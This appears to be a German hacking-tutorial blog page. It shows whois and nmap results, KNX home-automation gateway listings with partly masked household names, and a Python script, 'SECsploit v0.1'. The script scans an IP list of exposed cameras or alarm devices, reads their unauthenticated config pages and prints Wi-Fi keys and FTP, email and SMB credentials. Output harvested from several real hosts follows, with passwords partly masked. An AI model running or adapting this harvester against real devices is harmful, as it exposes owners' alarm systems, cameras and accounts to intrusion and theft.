Hacken lernen
Kali-Linux, Python-Programmierung und mehr...
mark@LAB1:~$ whois 159.48.55.230 % This is the RIPE Database query service. % The objects are in RPSL format. % % The RIPE Database is subject to Terms and Conditions. % See http://www.ripe.net/db/support/db-terms-conditions.pdf % Note: this output has been filtered. % To receive output for a database update, use the "-B" flag. % Information related to "159.48.55.0 - 159.48.55.255" % Abuse contact for "159.48.55.0 - 159.48.55.255" is "abuse@packethub.tech" inetnum: 159.48.55.0 - 159.48.55.255 netname: NORDVPN-L1 descr: Packethub S.A. country: NL org: ORG-PS409-RIPE admin-c: AG25300-RIPE tech-c: AG25300-RIPE status: LEGACY mnt-by: TERRATRANSIT-MNT mnt-lower: TERRATRANSIT-MNT mnt-routes: TERRATRANSIT-MNT mnt-domains: TERRATRANSIT-MNT created: 2021-02-18T19:49:46Z last-modified: 2021-02-18T19:49:46Z source: RIPE organisation: ORG-PS409-RIPE org-name: Packethub S.A. org-type: other address: Office 76, Plaza 2000, 50 Street and Marbella, Bella Vista address: Panama City address: Panama phone: +5078336503 admin-c: AG25300-RIPE tech-c: AG25300-RIPE abuse-c: PSID1-RIPE mnt-by: TERRATRANSIT-MNT mnt-ref: TERRATRANSIT-MNT mnt-ref: de-net1-1-mnt mnt-ref: de-kiservices-1-mnt mnt-ref: de-kis2-1-mnt mnt-ref: de-tt1data-1-mnt mnt-ref: de-stumpner-1-mnt mnt-ref: de-wn-1-mnt created: 2020-12-19T10:54:00Z last-modified: 2020-12-19T11:37:56Z source: RIPE # Filtered person: Alina Gatsaniuk address: Office 76, Plaza 2000, 50 Street and Marbella, Bella Vista address: Panama City address: Panama phone: +5078336503 nic-hdl: AG25300-RIPE mnt-by: TERRATRANSIT-MNT created: 2020-12-19T10:53:01Z last-modified: 2020-12-19T10:53:01Z source: RIPE # Filtered % Information related to "159.48.55.0/24AS136787" route: 159.48.55.0/24 origin: AS136787 mnt-by: TERRATRANSIT-MNT mnt-by: de-zterra1-1-mnt created: 2022-04-22T12:37:02Z last-modified: 2022-04-22T12:37:02Z source: RIPE % Information related to "159.48.55.0/24AS49981" route: 159.48.55.0/24 origin: AS49981 mnt-by: TERRATRANSIT-MNT mnt-by: de-zterra1-1-mnt created: 2021-03-22T20:38:14Z last-modified: 2021-03-22T20:38:14Z source: RIPE % This query was served by the RIPE Database Query Service version 1.103 (WAGYU)
mark@LAB1:~$ nmap -Pn 91.xx.xx.76 Starting Nmap 7.60 ( https://nmap.org ) at 2022-06-14 21:26 CEST Nmap scan report for xxxxxxxxx.yyyy.t-ipconnect.de (91.xx.xx.76) Host is up (0.042s latency). Not shown: 996 filtered ports PORT STATE SERVICE 554/tcp open rtsp 1935/tcp open rtmp 8080/tcp closed http-proxy 8081/tcp open blackice-icecap Nmap done: 1 IP address (1 host up) scanned in 8.27 seconds
KNX Gateway:
Device:
Friendly Name: Fam. G*********r
MAC Address: 50:4F:94:xx:xx:xx
Serial: 504f9xxxxxxx
KNX Address: 1.1.250
Multicast Address: 0.0.0.0
KNX Gateway:
Device:
Friendly Name: E****e Gerhard
MAC Address: 00:D0:93:xx:xx:xx
Serial: 00070xxxxxxx
KNX Address: 1.1.100
Multicast Address: 224.xx.xx.xx
KNX Gateway:
Device:
Friendly Name: Villa S*****l
MAC Address: EE:E0:00:xx:xx:xx
Serial: eee00xxxxxxx
KNX Address: 1.1.250
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
ba:73:16:b6:42:22:98:31
Signature Algorithm: sha256WithRSAEncryption
Issuer: CN=h****a.selfhost.bz
Validity
95.91.xxx.xx:1025 87.169.xxx.xxx:1025 87.159.xxx.xx:1025 83.221.xxx.xx:1025 79.255.xx.xxx:82
# SECsploit v0.1
import sys, requests
from bs4 import BeautifulSoup
with open("iplist.txt", "r") as f:
for ip_port in f:
ip_port = ip_port.strip()
url1 = f"http://{ip_port}/cgi-bin/admin/getparams.cgi"
url2 = f"http://{ip_port}/Upload.htm"
try:
print("="*50)
print(f"Infos for {ip_port}:")
print("-"*50)
res = requests.get(url1)
if res.status_code == 200:
txt = res.text
lines = txt.split("\n")
server_http = [False,False,False,False,False]
server_ftp = [False,False,False,False,False]
server_email = [False,False,False,False,False]
server_ns = [False,False,False,False,False]
for line in lines:
# Test wireless config
if line.startswith("wireless_ssid="):
if line != "wireless_ssid=''":
wireless = True
else:
wireless = False
# Output wireless config
if line.startswith("wireless_") and wireless:
print(line)
#print(line)
# Test server config
for i in range(5):
if line.startswith(f"server_i{i}_http_url="):
if line.strip() != f"server_i{i}_http_url='http://'":
server_http[i] = True
print("")
if line.startswith(f"server_i{i}_ftp_address="):
if line.strip() != f"server_i{i}_ftp_address=''":
server_ftp[i] = True
print("")
if line.startswith(f"server_i{i}_email_address="):
if line.strip() != f"server_i{i}_email_address=''":
server_email[i] = True
print("")
if line.startswith(f"server_i{i}_ns_location="):
if line.strip() != f"server_i{i}_ns_location=''":
server_ns[i] = True
print("")
# Output wireless config
for i in range(5):
if line.startswith(f"server_i{i}_http_") and server_http[i]:
print(line)
if line.startswith(f"server_i{i}_ftp_") and server_ftp[i]:
print(line)
if line.startswith(f"server_i{i}_email_") and server_email[i]:
print(line)
if line.startswith(f"server_i{i}_ns_") and server_ns[i]:
print(line)
print("="*50 + "\n")
continue
# Check URL2 (FTP credentials)
res = requests.get(url2)
if res.status_code == 200:
soup = BeautifulSoup(res.text, 'html.parser')
hostname = soup.find('input', {'name': 'FTPHostAddress'}).get('value')
username = soup.find('input', {'name': 'FTPUserName'}).get('value')
password = soup.find('input', {'name': 'FTPPassword'}).get('value')
if hostname != "":
print(f"FTP-Host: {hostname}")
print(f"FTP-User: {username}")
print(f"Password: {password}")
# Check email credentials
url2 = url2.replace("Upload.htm", "Email.htm")
res = requests.get(url2)
if res.status_code == 200:
soup = BeautifulSoup(res.text, 'html.parser')
hostname = soup.find('input', {'name': 'EmailSMTPServerAddress(1)'}).get('value')
senderad = soup.find('input', {'name': 'EmailSenderAddress(1)'}).get('value')
username = soup.find('input', {'name': 'EmailUserName(1)'}).get('value')
password = soup.find('input', {'name': 'EmailPassword(1)'}).get('value')
if hostname != "":
print(f"Email-Addr: {senderad}")
print(f"EMAIL-Host: {hostname}")
print(f"EMAIL-User: {username}")
print(f"Password: {password}")
print("="*50 + "\n")
continue
# No connection, ...
except (requests.exceptions.ConnectionError, ValueError) as e:
pass
================================================== Infos for 95.91.xxx.xx:1025: -------------------------------------------------- wireless_ssid='default' wireless_wlmode='Infra' wireless_channel='6' wireless_txrate='0' wireless_encrypt='0' wireless_authmode='OPEN' wireless_keylength='64' wireless_keyformat='HEX' wireless_keyselect='1' wireless_key1='0000000000' wireless_key2='0000000000' wireless_key3='0000000000' wireless_key4='0000000000' wireless_domain='0' wireless_algorithm='TKIP' wireless_presharedkey='0000000000' server_i0_email_address='smtp.web.de' server_i0_email_sslmode='1' server_i0_email_port='25' server_i0_email_username='s***********n@web.de' server_i0_email_passwd='j*********5' server_i0_email_senderemail='s***********n@web.de' server_i0_email_recipientemail='s***********n@web.de' ================================================== ================================================== Infos for 87.169.xxx.xxx:1025: -------------------------------------------------- wireless_ssid='FRITZ!Box 7590 CE' wireless_wlmode='Infra' wireless_channel='6' wireless_txrate='0' wireless_encrypt='3' wireless_authmode='OPEN' wireless_keylength='64' wireless_keyformat='HEX' wireless_keyselect='1' wireless_key1='0000000000' wireless_key2='0000000000' wireless_key3='0000000000' wireless_key4='0000000000' wireless_domain='0' wireless_algorithm='AES' wireless_presharedkey='8******************0' server_i0_ftp_address='192.168.178.2' server_i0_ftp_username='Secvest' server_i0_ftp_passwd='P**********0' server_i0_ftp_port='21' server_i0_ftp_passive='0' server_i0_ftp_location='camera_1/' server_i1_ns_location='//192.168.1.2/Zwischenablage/Alarmanlage' server_i1_ns_username='V****r' server_i1_ns_passwd='V****************1' server_i1_ns_workgroup='Workgroup' ================================================== ================================================== Infos for 87.159.xxx.xx:1025: -------------------------------------------------- wireless_ssid='default' wireless_wlmode='Infra' wireless_channel='6' wireless_txrate='0' wireless_encrypt='0' wireless_authmode='OPEN' wireless_keylength='64' wireless_keyformat='HEX' wireless_keyselect='1' wireless_key1='0000000000' wireless_key2='0000000000' wireless_key3='0000000000' wireless_key4='0000000000' wireless_domain='0' wireless_algorithm='TKIP' wireless_presharedkey='0000000000' server_i0_ftp_address='192.168.178.24' server_i0_ftp_username='Secvest' server_i0_ftp_passwd='P**********6' server_i0_ftp_port='21' server_i0_ftp_passive='0' server_i0_ftp_location='camera_1/' server_i2_ftp_address='192.168.178.31' server_i2_ftp_username='root' server_i2_ftp_passwd='1******1' server_i2_ftp_port='21' server_i2_ftp_passive='1' server_i2_ftp_location='/upload/vch1/' ================================================== ================================================== Infos for 83.221.xxx.xx:1025: -------------------------------------------------- wireless_ssid='WLAN-Fa1' wireless_wlmode='Infra' wireless_channel='6' wireless_txrate='0' wireless_encrypt='3' wireless_authmode='OPEN' wireless_keylength='64' wireless_keyformat='HEX' wireless_keyselect='1' wireless_key1='0000000000' wireless_key2='0000000000' wireless_key3='0000000000' wireless_key4='0000000000' wireless_domain='0' wireless_algorithm='AES' wireless_presharedkey='7******************8' server_i0_ftp_address='192.168.1.213' server_i0_ftp_username='Secvest' server_i0_ftp_passwd='P**********1' server_i0_ftp_port='21' server_i0_ftp_passive='0' server_i0_ftp_location='camera_1/' ================================================== ================================================== Infos for 79.255.xx.xxx:82: -------------------------------------------------- FTP-Host: 192.168.2.68 FTP-User: thorsten Password: o********6 ==================================================
